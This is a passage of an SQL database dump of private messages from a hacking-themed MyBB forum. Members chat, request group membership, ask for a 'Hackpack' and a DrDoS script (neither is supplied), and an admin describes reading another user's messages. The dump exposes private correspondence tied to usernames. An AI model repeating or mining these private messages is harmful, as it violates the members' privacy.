hacking communities then staying on LH is a mission. He gets banned everywhere for having too much attitude.\r\n\r\nBe honest this time was it my fault?\r\n[/quote]\r\nNo it wasnt, He messaged you with an attitude', '1349920349', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2989', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Timmy\'s Hackpack', '0', '[quote=\'Timmy\']\r\n[quote=\'??zg???g????61\']\r\nHey bro, the link in your post that you gave out for your 2GB \"Hackpack\" is down, do you think you could make a mediafire or something and send this too me? I\'d seriously appreciate it.\r\n[/quote]\r\n\r\nSorry but I don\'t have them anymore. \r\n[/quote]\r\n\r\nD: darn alright thanks anyway.', '1350054297', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2946', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nSup what\'s wrong man you have been inactive recently and away from L33THacking for a couple of days.\r\n[/quote]\r\nThere was thanks giving and I went away to see relatives. :3', '1349930097', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2948', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncan you change the forum icon to this?\r\n\r\nhttp://i.imgur.com/qvfmJ.png\r\n\r\nthanks alot bro.\r\n[/quote]\r\n\r\nConsider it done. \r\n[/quote]\r\n\r\nthanks alot bro.', '1349945450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2950', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: mod', '0', 'Nothing has Changed :P', '1349957566', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2951', '205', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349958964', '0', '3', '1350015133', '0', '0', '0', '1350014959'); INSERT INTO mybb_privatemessages VALUES('2952', '228', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349958964', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2953', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349959004', '0', '1', '0', '0', '0', '0', '1349959801'); INSERT INTO mybb_privatemessages VALUES('2954', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349959004', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2955', '100', '100', '232', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'LH Coders - Your Project', '0', 'Hey there, ??zg???g????61.\r\n\r\nIn order to keep the LHC free of people whom claim to code, but can\'t, each applicant is assigned a project which must be completed within 72 hours. All projects are different to one another to keep it free flowing and not-easily copied amongst other members. You may code the project in any language you choose.\r\n\r\n\r\nYou can:\r\n[list]\r\n[*]Use google to help you\r\n[*]Ask for help in the forums\r\n[*]Submit the project anytime, as long as it\'s within the 72 hours\r\n[/list]\r\n\r\nYou cannot:\r\n[list]\r\n[*]Copy and Paste\r\n[*]Get others to complete the project for you\r\n[*]Submit a project after the 72 hours\r\n[/list]\r\n\r\nYou must:\r\n[list]\r\n[*]Use correct indentation\r\n[*]Comment out code\r\n[*]Complete to the best of your ability\r\n[*]Release your project into the correct section in a formal manner\r\n[/list]\r\n\r\n\r\n[b]Your project:[/b]\r\nYou\'re to create an interactive game, which will take information from the user, and output certain data based upon the result of what the user enters in.', '1349972787', '0', '1', '0', '1', '0', '0', '1349972829'); INSERT INTO mybb_privatemessages VALUES('2957', '62', '62', '232', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'LH Coders - Your Project', '0', 'Hey there, R?????zo?.\r\n\r\nIn order to keep the LHC free of people whom claim to code, but can\'t, each applicant is assigned a project which must be completed within 72 hours. All projects are different to one another to keep it free flowing and not-easily copied amongst other members. You may code the project in any language you choose.\r\n\r\n\r\nYou can:\r\n[list]\r\n[*]Use google to help you\r\n[*]Ask for help in the forums\r\n[*]Submit the project anytime, as long as it\'s within the 72 hours\r\n[/list]\r\n\r\nYou cannot:\r\n[list]\r\n[*]Copy and Paste\r\n[*]Get others to complete the project for you\r\n[*]Submit a project after the 72 hours\r\n[/list]\r\n\r\nYou must:\r\n[list]\r\n[*]Use correct indentation\r\n[*]Comment out code\r\n[*]Complete to the best of your ability\r\n[*]Release your project into the correct section in a formal manner\r\n[/list]\r\n\r\n\r\n[b]Your project:[/b]\r\nYou\'re to create a program which will return the source code of a web page. This should then be able to be edited by the user, and have a preview of the code.', '1349973033', '0', '3', '1350036195', '1', '0', '0', '1349973537'); INSERT INTO mybb_privatemessages VALUES('2977', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need you to do me a favor.', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nSure thing, Ill make sure to watch him daily, But I can\'t view PMs.\r\n[/quote]\r\nDon\'t stalk him unless you are free, just keep checking his profile and by the online thing it will tell you if he is sending a PM and whose profile he is viewing. \r\n[/quote]\r\nWill do.', '1350004539', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2964', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Timmy\'s Hackpack', '0', 'Hey bro, the link in your post that you gave out for your 2GB \"Hackpack\" is down, do you think you could make a mediafire or something and send this too me? I\'d seriously appreciate it.', '1349975984', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2966', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: mod', '0', '[quote=\'VirtualLegend\']\r\nNothing has Changed :P\r\n[/quote]\r\n\r\nTrue, I was in ACP and when I clicked edit on your username to make you a Mod I noticed you are using a unique email is it possible for you to please use a recongizible email?', '1349996828', '0', '1', '0', '1', '0', '0', '1350025532'); INSERT INTO mybb_privatemessages VALUES('2967', '2', '2', '224', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Site', '0', 'How much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.', '1350001307', '0', '3', '1350037594', '0', '0', '0', '1350037558'); INSERT INTO mybb_privatemessages VALUES('2969', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Sup', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSup what\'s wrong man you have been inactive recently and away from L33THacking for a couple of days.\r\n[/quote]\r\nThere was thanks giving and I went away to see relatives. :3\r\n[/quote]\r\n\r\nOh yeah I remember.', '1350002873', '0', '1', '0', '1', '0', '0', '1350037543'); INSERT INTO mybb_privatemessages VALUES('2970', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Unique', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncan you change the forum icon to this?\r\n\r\nhttp://i.imgur.com/qvfmJ.png\r\n\r\nthanks alot bro.\r\n[/quote]\r\n\r\nConsider it done. \r\n[/quote]\r\n\r\nthanks alot bro.\r\n[/quote]\r\n\r\nNP. ', '1350002887', '0', '1', '0', '1', '0', '0', '1350030965'); INSERT INTO mybb_privatemessages VALUES('2978', '100', '100', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Timmy\'s Hackpack', '0', '[quote=\'??zg???g????61\']\r\nHey bro, the link in your post that you gave out for your 2GB \"Hackpack\" is down, do you think you could make a mediafire or something and send this too me? I\'d seriously appreciate it.\r\n[/quote]\r\n\r\nSorry but I don\'t have them anymore. ', '1350005803', '0', '3', '1350054297', '1', '0', '0', '1350054276'); INSERT INTO mybb_privatemessages VALUES('2972', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Need you to do me a favor.', '0', '[url=http://l33thacking.net/user-224.html]Monkey[/url] seems to be up to something with L33THacking, I have noticed him log on to LH almost everyday and browse then go offline. Today when I was browsing through sites PM I saw a PM titled \"Site\" so I viewed it and this is what I found.\r\n\r\nPrivate Message\r\nTo: Apathy\r\nFrom: monkey\r\nSubject: Site\r\nDate: 10-11-2012, 08:21 PM\r\nHow much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.\r\n\r\nSo if Monkey posts something that could harm L33THacking in anyway or if you see that he is sending out too many PMs that ban him saying LH is not for sale. Ban him for a day then I\'ll handle it.\r\n\r\nThanks.', '1350004313', '0', '3', '1350004450', '1', '0', '0', '1350004406'); INSERT INTO mybb_privatemessages VALUES('2974', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need you to do me a favor.', '0', 'Sure thing, Ill make sure to watch him daily, But I can\'t view PMs.', '1350004450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2975', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Need you to do me a favor.', '0', '[quote=\'NXK\']\r\nSure thing, Ill make sure to watch him daily, But I can\'t view PMs.\r\n[/quote]\r\nDon\'t stalk him unless you are free, just keep checking his profile and by the online thing it will tell you if he is sending a PM and whose profile he is viewing. ', '1350004512', '0', '3', '1350004539', '1', '0', '0', '1350004514'); INSERT INTO mybb_privatemessages VALUES('3046', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: i have a question related to postin a thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sbhshroy2\']\r\ncan i post premium acount with adf.ly link.\r\n[/quote]\r\n\r\nYeah adf.ly links are allowed but survey links are not allowed on L33THacking.\r\n[/quote]\r\n\r\nok.', '1350102193', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3049', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Domain Register', '0', 'Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.', '1350109758', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3053', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'HELP please', '0', 'SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO ', '1350117047', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3055', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'gamers crew please', '0', 'hey i want to join the gamers crew my username is treyz123456789\r\nthanks pm me back', '1350118047', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3056', '258', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Hey', '0', 'I want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.', '1350125361', '0', '3', '1350125483', '1', '0', '2', '1350125430'); INSERT INTO mybb_privatemessages VALUES('3057', '254', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Hey', '0', 'I want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.', '1350125361', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3058', '254', '254', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: Hey', '0', '[quote=\'Greed\']\r\nI want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.\r\n[/quote\r\n\r\nNo im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy', '1350125483', '0', '3', '1350125583', '0', '0', '0', '1350125501'); INSERT INTO mybb_privatemessages VALUES('3059', '258', '254', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hey', '0', '[quote=\'Greed\']\r\nI want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.\r\n[/quote\r\n\r\nNo im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy', '1350125483', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3060', '258', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Hey', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'Greed\']\r\nI want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.\r\n[/quote\r\n\r\nNo im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy\r\n[/quote]\r\n\r\nno lol, I was joking, If I were the real thing I wouldn\'t be on here right now.', '1350125583', '0', '1', '0', '1', '0', '2', '1350126222'); INSERT INTO mybb_privatemessages VALUES('3061', '254', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: Hey', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'Greed\']\r\nI want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.\r\n[/quote\r\n\r\nNo im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy\r\n[/quote]\r\n\r\nno lol, I was joking, If I were the real thing I wouldn\'t be on here right now.', '1350125583', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3062', '61', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'hey how do i +rep people', '0', 'hey i dont know hoe to +rep people ', '1350132085', '0', '3', '1350144129', '1', '0', '0', '1350144105'); INSERT INTO mybb_privatemessages VALUES('3063', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey how do i +rep people', '0', 'hey i dont know hoe to +rep people ', '1350132085', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3064', '2', '2', '224', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Site', '0', '[quote=\'Apathy\']\r\n[quote=\'monkey\']\r\n[quote=\'Apathy\']\r\n[quote=\'monkey\']\r\nHow much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.\r\n[/quote]\r\nI have no idea sorry.\r\n[/quote]\r\n\r\nHow\'s $10?\r\n[/quote]\r\n\r\nI don\'t know contact the founder. \r\n[/quote]\r\n\r\nWhat\'s his user?', '1350143852', '0', '3', '1350173060', '0', '0', '0', '1350172983'); INSERT INTO mybb_privatemessages VALUES('3068', '257', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey how do i +rep people', '0', '[quote=\'treyz123456789\']\r\nhey i dont know hoe to +rep people \r\n[/quote]\r\n\r\nYou have to be a Upgraded member to +rep.', '1350144129', '0', '1', '0', '1', '0', '2', '1350162954'); INSERT INTO mybb_privatemessages VALUES('3069', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey how do i +rep people', '0', '[quote=\'treyz123456789\']\r\nhey i dont know hoe to +rep people \r\n[/quote]\r\n\r\nYou have to be a Upgraded member to +rep.', '1350144129', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3070', '257', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Gamers', '0', 'You have been accepted.', '1350144227', '0', '3', '1350162950', '1', '0', '2', '1350162895'); INSERT INTO mybb_privatemessages VALUES('3071', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Gamers', '0', 'You have been accepted.', '1350144227', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3072', '257', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Slow down ..', '0', 'You need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ', '1350144321', '0', '3', '1350162890', '1', '0', '2', '1350162804'); INSERT INTO mybb_privatemessages VALUES('3073', '100', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Slow down ..', '0', 'You need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ', '1350144321', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3074', '254', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Accepted', '0', 'You have been accepted to gamers, Please be patient while we gather more members.', '1350145852', '0', '3', '1350147897', '1', '0', '2', '1350147852'); INSERT INTO mybb_privatemessages VALUES('3075', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Accepted', '0', 'You have been accepted to gamers, Please be patient while we gather more members.', '1350145852', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3076', '61', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Accepted', '0', '[quote=\'NXK\']\r\nYou have been accepted to gamers, Please be patient while we gather more members.\r\n[/quote]\r\n\r\nlol thank you, pretty awesome.', '1350147897', '0', '1', '0', '1', '0', '2', '1350149846'); INSERT INTO mybb_privatemessages VALUES('3077', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Accepted', '0', '[quote=\'NXK\']\r\nYou have been accepted to gamers, Please be patient while we gather more members.\r\n[/quote]\r\n\r\nlol thank you, pretty awesome.', '1350147897', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3079', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP', '1350153309', '0', '3', '1350156158', '1', '0', '0', '1350156120'); INSERT INTO mybb_privatemessages VALUES('3080', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Fw: gamers crew please', '0', '[quote=\'treyz123456789\']\r\nhey i want to join the gamers crew my username is treyz123456789\r\nthanks pm me back\r\n[/quote]\r\n\r\nThat\'s a request from an active gamer on ubers. I would apprecia if you could add him to the gamers group.', '1350153394', '0', '3', '1350153503', '1', '0', '0', '1350153474'); INSERT INTO mybb_privatemessages VALUES('3081', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: HELP please', '0', '[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.', '1350153453', '0', '3', '1350164126', '1', '0', '0', '1350162729'); INSERT INTO mybb_privatemessages VALUES('3083', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: gamers crew please', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nhey i want to join the gamers crew my username is treyz123456789\r\nthanks pm me back\r\n[/quote]\r\n\r\nThat\'s a request from an active gamer on ubers. I would apprecia if you could add him to the gamers group.\r\n[/quote]\r\nHe\'s already been added. I did it this morning.', '1350153503', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3084', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: gamers crew please', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nhey i want to join the gamers crew my username is treyz123456789\r\nthanks pm me back\r\n[/quote]\r\n\r\nThat\'s a request from an active gamer on ubers. I would apprecia if you could add him to the gamers group.\r\n[/quote]\r\nHe\'s already been added. I did it this morning.\r\n[/quote]\r\n\r\nOh OK, Didn\'t notice that thanks. ', '1350153618', '0', '1', '0', '1', '0', '0', '1350153634'); INSERT INTO mybb_privatemessages VALUES('3086', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks', '1350156158', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3087', '100', '100', '128', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'DrDos script', '0', 'Hi there,\r\n\r\nMay I have that DrDos script you are talking about ?\r\nI will not release this somewhere else !\r\n\r\nI thank you in advance ^^', '1350159246', '0', '1', '0', '0', '0', '0', '1350188883'); INSERT INTO mybb_privatemessages VALUES('3088', '128', '100', '128', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'DrDos script', '0', 'Hi there,\r\n\r\nMay I have that DrDos script you are talking about ?\r\nI will not release this somewhere else !\r\n\r\nI thank you in advance ^^', '1350159246', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3090', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nthanks appreciated keep up the good work and ill stay active ', '1350162797', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3091', '100', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Slow down ..', '0', '[quote=\'??zg???g????61\']\r\nYou need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ\r\n[/quote]\r\nsorry im trying my hardest not to spam if you look at some of my post its not all spam most of its Hq\r\nSORRY:(', '1350162890', '0', '1', '0', '1', '0', '0', '1350188863'); INSERT INTO mybb_privatemessages VALUES('3092', '257', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Slow down ..', '0', '[quote=\'??zg???g????61\']\r\nYou need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ\r\n[/quote]\r\nsorry im trying my hardest not to spam if you look at some of my post its not all spam most of its Hq\r\nSORRY:(', '1350162890', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3093', '61', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Gamers', '0', '[quote=\'NXK\']\r\nYou have been accepted.\r\n[/quote]\r\nTHANK YOU VERY MUCH NXK', '1350162950', '0', '1', '0', '1', '0', '0', '1350164447'); INSERT INTO mybb_privatemessages VALUES('3094', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Gamers', '0', '[quote=\'NXK\']\r\nYou have been accepted.\r\n[/quote]\r\nTHANK YOU VERY MUCH NXK', '1350162950', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3095', '62', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'that logo ', '0', 'hey the company is noob and the rest is up to you \r\nyou can completly do what you want with ', '1350163834', '0', '1', '0', '1', '0', '0', '1350163920'); INSERT INTO mybb_privatemessages VALUES('3096', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'that logo ', '0', 'hey the company is noob and the rest is up to you \r\nyou can completly do what you want with ', '1350163834', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3098', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people', '1350164126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3099', '61', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'hey i cant rep people ', '0', 'hey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work', '1350165767', '0', '3', '1350166793', '1', '0', '0', '1350166745'); INSERT INTO mybb_privatemessages VALUES('3100', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey i cant rep people ', '0', 'hey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work', '1350165767', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3101', '257', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey i cant rep people ', '0', '[quote=\'treyz123456789\']\r\nhey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work\r\n[/quote]\r\nYou need to purchase an upgrade if you\'d like to rep people. It costs 5$', '1350166793', '0', '1', '0', '1', '0', '2', '1350183327'); INSERT INTO mybb_privatemessages VALUES('3102', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey i cant rep people ', '0', '[quote=\'treyz123456789\']\r\nhey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work\r\n[/quote]\r\nYou need to purchase an upgrade if you\'d like to rep people. It costs 5$', '1350166793', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3103', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.', '1350168776', '0', '3', '1350169229', '1', '0', '0', '1350169014'); INSERT INTO mybb_privatemessages VALUES('3104', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: HELP please', '0', '[quote=\'treyz123456789\']\r\n[quote=\'t3h 